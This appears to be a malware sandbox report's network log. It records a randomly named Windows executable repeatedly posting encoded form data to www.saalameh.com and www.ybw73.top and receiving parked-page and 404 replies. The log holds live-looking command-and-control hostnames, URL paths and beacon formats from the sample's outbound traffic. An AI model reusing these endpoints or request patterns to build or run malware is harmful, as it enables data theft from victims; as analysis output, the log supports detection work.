                                                      Data Ascii: lxRlvTSh=Sy6xV0ER6CgjY70Ckau3SavvoL7SUxTGyIG+twSNcDon5wWltPhjG9xIIn+Stb2j6vu2cNaBmpwh/iJMS7wLQs7lJ8z715KImGr84o9I9r6yo+KhIe98gQT111v3HXwtm7cz9Jrs2Wnu2/WHGZbRY2uOYvTsHiW7+4eNv1m5qQML57arjCshwHqsgU89e4jZiw==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.44977284.32.84.32803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:28.227508068 CEST702OUTPOST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 53 79 36 78 56 30 45 52 36 43 67 6a 59 61 45 43 68 39 43 33 54 36 76 6f 69 72 37 53 47 78 54 4b 79 4a 36 2b 74 31 71 64 63 56 59 6e 36 56 79 6c 71 38 35 6a 42 39 78 49 63 33 2b 54 77 4c 32 6f 36 76 69 2b 63 49 69 42 6d 70 6b 68 2f 6a 35 4d 54 49 49 49 52 38 37 6e 47 63 7a 35 78 35 4b 49 6d 47 72 38 34 73 74 78 39 72 79 79 72 4f 36 68 4a 38 56 7a 74 77 54 79 79 31 76 33 57 48 77 70 6d 37 63 46 39 4d 50 4b 32 55 76 75 32 36 71 48 47 4e 32 48 52 32 75 49 47 66 53 47 49 6a 75 79 6d 70 57 43 33 57 4b 2b 71 30 4d 38 31 64 4c 78 79 7a 4e 32 69 48 4f 66 39 54 31 4a 54 37 65 51 35 33 56 39 59 4d 72 32 61 6f 6d 59 45 51 50 4a 6d 56 58 68 45 6f 55 3d
                                                      Data Ascii: lxRlvTSh=Sy6xV0ER6CgjYaECh9C3T6voir7SGxTKyJ6+t1qdcVYn6Vylq85jB9xIc3+TwL2o6vi+cIiBmpkh/j5MTIIIR87nGcz5x5KImGr84stx9ryyrO6hJ8VztwTyy1v3WHwpm7cF9MPK2Uvu26qHGN2HR2uIGfSGIjuympWC3WK+q0M81dLxyzN2iHOf9T1JT7eQ53V9YMr2aomYEQPJmVXhEoU=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.44977384.32.84.32803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:30.811510086 CEST10784OUTPOST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 53 79 36 78 56 30 45 52 36 43 67 6a 59 61 45 43 68 39 43 33 54 36 76 6f 69 72 37 53 47 78 54 4b 79 4a 36 2b 74 31 71 64 63 56 51 6e 36 6a 2b 6c 70 63 46 6a 41 39 78 49 44 48 2b 57 77 4c 32 50 36 76 36 36 63 49 2b 72 6d 72 63 68 77 68 42 4d 55 35 49 49 59 38 37 6e 45 63 7a 36 31 35 4c 41 6d 48 61 31 34 6f 4a 78 39 72 79 79 72 4d 53 68 41 4f 39 7a 72 77 54 31 31 31 76 37 48 58 77 56 6d 34 73 56 39 4e 50 38 31 6c 50 75 32 65 32 48 56 49 61 48 65 32 75 4b 48 66 53 65 49 69 54 71 6d 74 2f 7a 33 58 2b 59 71 7a 38 38 32 35 2b 46 33 79 4d 70 38 6c 65 51 67 77 5a 76 62 72 58 52 32 55 46 65 63 76 33 75 43 37 36 50 44 6a 53 79 2b 41 4c 39 56 64 32 31 45 71 72 57 55 4b 30 57 6b 4a 53 35 64 2b 57 41 35 44 4e 49 4e 5a 4e 4d 77 77 50 71 42 4f 57 43 56 4e 70 43 5a 4f 59 66 34 58 34 62 65 6d 2b 77 53 63 33 64 54 76 74 4a 76 34 62 76 5a 74 56 77 56 46 4f 67 4d 52 30 78 58 4a 48 59 42 5a 43 65 64 57 69 57 68 4a 63 56 63 67 61 34 63 6f 43 6b 61 55 44 6a 68 7a 5a 77 34 4f 68 46 75 6f 70 62 56 [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=Sy6xV0ER6CgjYaECh9C3T6voir7SGxTKyJ6+t1qdcVQn6j+lpcFjA9xIDH+WwL2P6v66cI+rmrchwhBMU5IIY87nEcz615LAmHa14oJx9ryyrMShAO9zrwT111v7HXwVm4sV9NP81lPu2e2HVIaHe2uKHfSeIiTqmt/z3X+Yqz8825+F3yMp8leQgwZvbrXR2UFecv3uC76PDjSy+AL9Vd21EqrWUK0WkJS5d+WA5DNINZNMwwPqBOWCVNpCZOYf4X4bem+wSc3dTvtJv4bvZtVwVFOgMR0xXJHYBZCedWiWhJcVcga4coCkaUDjhzZw4OhFuopbV2zRK7Z1eREJHvs1nLY8A6x4WpXiWEDsW9JLWMjEbLUBiz7ekF7c+xOyDwcNsjYk3xCVx17zdMWYpmlk37+ITABf44xODYYR6QdP3xx5EIk7BKmQxIh+g/pcC5VgQEb4eAGLgpkmmBXZcHfSEWmk3OMfS204EU+oy5KC1fo+RaNz5F9XcgqsQZKyrO9zGn54aSaUPJre907Laj+qGkxao86YQA/kkhIqcJ0dRxysohYniZUqccffJTDbeFwDFNMC6hs+nvOTHk7K8QWnP5wtjbv7nuySDTxBxdpG3H5aZPSK7dyU35gectlU8lVKf+SHgECs1Gsrn7p4POr6QcT4/BOK3wbIVUEcAhj9TIH8BPD7F/C+OgDXXg0UTulUeLJGuBy2+DXLgjZvYEfNxBlXY1ENzGZUEfAYbDB+UJII4/8yPorRjkVRfy0cvEtEeEY+3FHIUrxfVJMvyk3kwlu/QgspeoYLelwTYx5BjGM2dApWKfRvhn9YzXXm7oI8Xs3/Dvh64GxdH/X3IiDcAb22BpoXXFywBryk27Shb2mCoHaqJ4EEgzMXfZAKBFXnm287pYtimE6+9Xf0pjcKSwhX5mED/cserwTi9WPzNmWwpquO0B6sQHZnN4O1mgBjy42lqJUCQ7cdmDkIiHcmOsb/Ot8dNN+zhKEQvmo [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.44977484.32.84.32803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:33.361753941 CEST416OUTGET /hfb9/?lxRlvTSh=fwSRWDIDlEtpZKpO15TnR7rdvvbvUQOUwoPVjl38Pi8M+UCq29ZeNKRmFQz0yoK86tSBJtX0+7UQykNFUthSdrPfT9CD49CruGe2y7ZC/ovpvsGUE+526xA=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:33.812366009 CEST1236INHTTP/1.1 200 OK
                                                      Server: hcdn
                                                      Date: Wed, 03 Jul 2024 15:46:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 10072
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      alt-svc: h3=":443"; ma=86400
                                                      x-hcdn-request-id: d07753e343f9acdaf7a0a1d2e64992e7-bos-edge1
                                                      Expires: Wed, 03 Jul 2024 15:46:32 GMT
                                                      Cache-Control: no-cache
                                                      Accept-Ranges: bytes
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                      Jul 3, 2024 17:46:33.812411070 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                      Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                      Jul 3, 2024 17:46:33.812423944 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                      Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                      Jul 3, 2024 17:46:33.812434912 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                      Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                      Jul 3, 2024 17:46:33.812447071 CEST896INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                      Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                      Jul 3, 2024 17:46:33.812458992 CEST1236INData Raw: 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69 6e 20 69 73 20 61 63 74 69 76 65 20 61 6e 64 20 69 73 20 75 73 69 6e 67 20 48 6f 73 74 69 6e 67 65 72 20 6e 61 6d 65 73 65 72 76 65 72 73 2e 20
                                                      Data Ascii: with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger.com/hostinger-academy/dns/domain-default-img.sv
                                                      Jul 3, 2024 17:46:33.812470913 CEST1236INData Raw: 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76 65 72 73 3c 2f 64 69 76 3e 3c 62 72 3e 3c 70 3e 4d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76 65 72 73 20 69
                                                      Data Ascii: olumn-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger r
                                                      Jul 3, 2024 17:46:33.812493086 CEST1236INData Raw: 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35 3c 32 36 29 2c 31 32 38 3c 3d 65 2e 63 68 61 72 43 6f 64 65
                                                      Data Ascii: ))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeError("punycode_bad_i
                                                      Jul 3, 2024 17:46:33.812706947 CEST864INData Raw: 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 20 28 31 29 22 29 3b 66
                                                      Data Ascii: &&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(Stri


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.44977538.47.232.233803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:39.233753920 CEST673OUTPOST /0ag0/ HTTP/1.1
                                                      Host: www.ybw73.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.ybw73.top
                                                      Referer: http://www.ybw73.top/0ag0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 76 68 45 52 7a 6a 44 61 54 30 59 34 48 70 56 6b 38 4b 30 4a 7a 6e 2f 6d 4e 5a 63 72 76 6c 5a 65 46 4f 52 6c 59 36 4d 63 33 77 48 47 49 7a 4a 59 74 72 5a 4b 46 63 49 54 72 55 67 36 77 44 2b 37 55 2f 52 66 58 75 4c 32 6c 55 68 70 70 43 72 35 77 57 46 50 46 30 54 4e 35 55 61 4d 4c 51 66 74 67 6c 70 41 41 69 56 66 2b 7a 43 6a 61 66 48 36 51 4f 62 32 72 32 63 4d 54 43 58 63 64 49 63 56 52 46 49 2b 74 70 34 7a 65 63 6a 72 53 61 49 70 62 55 35 59 37 46 33 41 43 72 66 31 61 32 46 4b 66 46 72 31 31 5a 43 45 65 36 42 76 48 53 4c 36 32 4e 64 32 66 4a 46 35 4e 54 2b 58 37 68 62 65 69 41 3d 3d
                                                      Data Ascii: lxRlvTSh=vhERzjDaT0Y4HpVk8K0Jzn/mNZcrvlZeFORlY6Mc3wHGIzJYtrZKFcITrUg6wD+7U/RfXuL2lUhppCr5wWFPF0TN5UaMLQftglpAAiVf+zCjafH6QOb2r2cMTCXcdIcVRFI+tp4zecjrSaIpbU5Y7F3ACrf1a2FKfFr11ZCEe6BvHSL62Nd2fJF5NT+X7hbeiA==
                                                      Jul 3, 2024 17:46:40.123665094 CEST289INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 15:46:39 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.44977638.47.232.233803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:41.769730091 CEST693OUTPOST /0ag0/ HTTP/1.1
                                                      Host: www.ybw73.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.ybw73.top
                                                      Referer: http://www.ybw73.top/0ag0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 76 68 45 52 7a 6a 44 61 54 30 59 34 56 35 46 6b 2f 70 4d 4a 32 48 2f 6c 48 35 63 72 68 31 5a 61 46 4f 56 6c 59 37 59 79 33 43 6a 47 49 57 31 59 73 70 78 4b 43 63 49 54 7a 6b 67 6d 75 7a 2b 47 55 2f 74 74 58 76 62 32 6c 55 31 70 70 44 62 35 78 6c 74 49 46 6b 54 44 32 30 61 43 56 67 66 74 67 6c 70 41 41 69 52 31 2b 7a 61 6a 61 73 76 36 43 2f 62 31 6c 57 63 50 46 79 58 63 5a 49 64 63 52 46 49 4d 74 74 77 5a 65 65 4c 72 53 62 34 70 62 42 4e 62 78 46 33 47 4f 37 65 47 52 48 55 76 47 31 33 35 39 71 61 71 5a 72 78 79 43 55 61 67 6e 38 38 68 4e 4a 68 4b 51 55 33 6a 32 69 6d 58 35 41 5a 72 2f 6d 55 59 4f 71 66 51 56 58 52 75 6e 51 34 59 49 30 30 3d
                                                      Data Ascii: lxRlvTSh=vhERzjDaT0Y4V5Fk/pMJ2H/lH5crh1ZaFOVlY7Yy3CjGIW1YspxKCcITzkgmuz+GU/ttXvb2lU1ppDb5xltIFkTD20aCVgftglpAAiR1+zajasv6C/b1lWcPFyXcZIdcRFIMttwZeeLrSb4pbBNbxF3GO7eGRHUvG1359qaqZrxyCUagn88hNJhKQU3j2imX5AZr/mUYOqfQVXRunQ4YI00=
                                                      Jul 3, 2024 17:46:42.890132904 CEST289INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 15:46:42 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.44977738.47.232.233803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:44.296518087 CEST10775OUTPOST /0ag0/ HTTP/1.1
                                                      Host: www.ybw73.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.ybw73.top
                                                      Referer: http://www.ybw73.top/0ag0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 76 68 45 52 7a 6a 44 61 54 30 59 34 56 35 46 6b 2f 70 4d 4a 32 48 2f 6c 48 35 63 72 68 31 5a 61 46 4f 56 6c 59 37 59 79 33 43 72 47 49 6b 4e 59 73 4f 74 4b 44 63 49 54 36 45 67 32 75 7a 2b 68 55 2f 31 54 58 71 44 6d 6c 53 78 70 76 51 54 35 6b 6b 74 49 4f 6b 54 44 75 45 61 44 4c 51 66 34 67 6c 35 45 41 69 42 31 2b 7a 61 6a 61 70 72 36 56 2b 62 31 31 6d 63 4d 54 43 58 59 64 49 64 30 52 46 51 63 74 74 38 6a 65 76 72 72 53 37 6f 70 64 7a 6c 62 7a 6c 33 45 50 4c 65 65 52 48 59 38 47 31 61 4b 39 70 47 41 5a 72 46 79 4f 77 6a 6a 39 2b 34 2f 52 4c 4e 76 4e 6e 72 32 31 51 6d 73 39 6a 42 6b 35 45 68 47 4f 37 50 37 5a 48 6f 66 33 79 55 36 62 7a 7a 69 68 57 47 65 34 33 2f 39 6b 4c 38 61 47 57 4d 45 4c 39 38 63 71 39 71 66 32 77 37 73 7a 73 63 57 53 6f 34 7a 50 7a 6b 37 55 31 71 79 6d 55 36 7a 77 64 61 61 44 6e 5a 4f 78 4b 6e 64 75 35 77 33 4d 2f 50 6d 49 49 6b 4c 71 6f 42 4a 7a 37 2b 6a 62 46 42 30 67 75 4c 63 52 73 47 63 6b 6f 4d 48 77 4e 5a 5a 48 34 6a 71 4f 70 68 31 62 50 50 78 30 [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=vhERzjDaT0Y4V5Fk/pMJ2H/lH5crh1ZaFOVlY7Yy3CrGIkNYsOtKDcIT6Eg2uz+hU/1TXqDmlSxpvQT5kktIOkTDuEaDLQf4gl5EAiB1+zajapr6V+b11mcMTCXYdId0RFQctt8jevrrS7opdzlbzl3EPLeeRHY8G1aK9pGAZrFyOwjj9+4/RLNvNnr21Qms9jBk5EhGO7P7ZHof3yU6bzzihWGe43/9kL8aGWMEL98cq9qf2w7szscWSo4zPzk7U1qymU6zwdaaDnZOxKndu5w3M/PmIIkLqoBJz7+jbFB0guLcRsGckoMHwNZZH4jqOph1bPPx0QmWK0er4eRezez+wOYzKSCLnOys3srnB6vzBwsEl6s3Md7WtwJrIgzVjfgXAN8qfaO6ZhHib5W6njeW51ncYoxu+R6PdF8zLOaPpH3/Rltm9hS39bqiGEXIjwU7hOKs7owBKHtVgNOf2gkpiC15EBrQnTV1fsBvriofIlig5HbLCFYHJkE6o6CyD4axwbUqv8lgrkBezHvBORrhiA/kLOuE7jMbAeTzt2SkFeJGyDAywyJLGv4k+g9MenAJ1ImivKvKUlsFTpK2eKzbzPwQnzEu1Q1Z71mWw8OiQGrO//C3yo5XdTCzs8OPgsBxInu6UnkKNNeV7uBK+oyWsss9xIUD7AJx32qX65n0+NQvFxxpbZFA/bUoG7v4csViZsz4q2Ov6DmlAHB5J0rXnGhJ3+kvKOqIglsoPQDPS+cxTnXAyxRMF4W4aT+m1AXIX8KL3UMb9+DZv9ZMw4etUKoR1K+SIzNeFwcHmm9sXg4TzfcbI4Vbg6KFyAZi5/vgsxbdRXeHgUjxpwL1bagLkq4rLdh0jb2bDfqaE10SS3vuIzkqcucRbJnnHYPE1iQ3FjrTZUbhjoE0t4T5VimO1EQ6ZCmqIcVqEiBMtdU77i7hd57OKFnuN3j9KYFurXqPmva5bPwj2vbmaJd/2J69YqXGmEaERIPir2botAC [TRUNCATED]
                                                      Jul 3, 2024 17:46:45.266102076 CEST289INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 15:46:45 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
